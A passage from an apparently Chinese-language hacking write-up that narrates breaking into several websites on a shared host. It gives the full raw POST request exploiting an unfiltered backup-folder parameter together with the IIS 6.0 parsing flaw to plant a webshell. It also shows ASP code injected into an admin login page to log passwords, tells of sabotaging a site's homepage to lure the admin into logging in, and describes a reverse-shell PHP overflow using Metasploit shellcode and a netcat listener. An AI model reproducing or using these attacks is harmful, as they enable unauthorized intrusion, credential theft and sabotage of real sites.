"\" & bkdbname & ".mdb</center>"
response.write "<center><a href='Databackup\" & bkdbname & ".mdb' a>下载本次
备份数据库到本地</a></center>" Else
response.write "找不到您所需要备份的文件。"
End if end sub
第 68 行 bkfolder=request.form("bkfolder") 没有对目录名做过滤。
而 request.form("bkfolder")是从第 37 行这句代码传过来的。
<td height="22"><input type="hidden" size=50 name=bkfolder value=Databackup ></td>
说明默认情况下 bkfolder= Databackup 这个目录。
第 72 到 76 行,是说检测 bkfolder 这个目录是否存在,如果不存在就调用
MakeNewsDir bkfolder 这个函数。
再看 98—103 行代码如下:
Function MakeNewsDir(foldername)
Set fso1 = CreateObject("Scripting.FileSystemObject") Set f = fso1.CreateFolder(foldername)
MakeNewsDir = True
Set fso1 = nothing
End Function
直接调用 fso 创建一个没有过滤的参数的文件夹。
这时大家可能都想到了,那么如果我们上传的时候抓包,把默认的文件夹 Databackup
改为 kyo.asp,那不就创建了一个 kyo.asp 的文件夹吗?这样配合 iis6.0 的漏洞将可以成
功执行我的美女图片 asp 木马。
实战当中也是这样的,把抓的包改为这样的形式,再用 nc 提交就 KO 了。
POST /manage/Admin_DataBackup.asp?action=Backup HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
2.0.50727)
Host: www.bbb3.com
Content-Length: 77
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSATTCRQC=LFGDIANCDLPBPGNJNCMPKEIM; Scms%5FVerifyCode=9109
DBpath=..%2FUpLoadFile%2F20120112012046769.jpg&bkfolder=kyo.asp&bkDBname=da ta
那么备份成功后,菜刀提交 url 路径类似于这样: http://www.bbb3.com/manage/kyo.asp/data.mdb 至此也算拿下了一个 webshell,万里长征又进了一步。
asp 登陆口嗅探变态的密码
幸运的是 www.bbb3.com所在的虚拟主机没有做什么安全措施,传上去一个aspx的木马就 可以跨到 www.bbb1.com和 www.bbb2.com的目录里去了,毕竟aspx默认是权限稍大的user权 限。在尝试ftp密码无果后,下一步就是在bbb1 和bbb2 的后台登陆口页面写嗅探代码了。 我在 Admin_Send.asp 页面第 8 行开始添加以下代码:
thename=replace(trim(request.form("username")),"'","") thepass=replace(trim(Request.form("password")),"'","") SaveFile="page.gif"
GetPostStr=thename&"|"&thepass
set F=server.CreateObject("scripting.filesystemobject") set I=F.OpenTextFile(server.mappath(SaveFile),8,True,0) I.WriteLine(GetPostStr)
I.close
Set F=nothing
只要管理员登陆后台,密码就会被记录在 page.gif 中,剩下的就只有等了。
但我不是一个忍者,等了一天无果后,我就在他数据库网站配置字段做了点手脚
致使访问他网站首页是空白,但是后台还是可以正常登陆的。果然这家伙不到半天就急了, 当天晚上的时候我就顺利的嗅探到了他的变态的密码。可以看到,密码果然很强悍,10 位以上,字母数字再加上+-号,让cmd5再添 50 公斤的硬盘也破不了啊。
拿到这个关键性的密码,再用前面研究出的 3hoocms 后台getshell漏洞,轻车熟路的
拿下 www.bbb.com的webshell,也就是a.111.com所在的虚拟主机。
接下来的任务就是提权跨目录到 a.111.com 了。
突破星外+护卫神
进行到这里,在星外虚拟主机+护卫神.入侵防护专家的防御之下,确实让人望而却步。好 在php版本比较低,我终于用上了那个调试好的php溢出漏洞。在metasploit生成一个反弹端 口的shellcode添加到那个exp.php代码中后。我在本机执行nc –vvlp 8181,然后把exp.php 传到 www.bbb.com根目录。当我在浏览器打开 | 
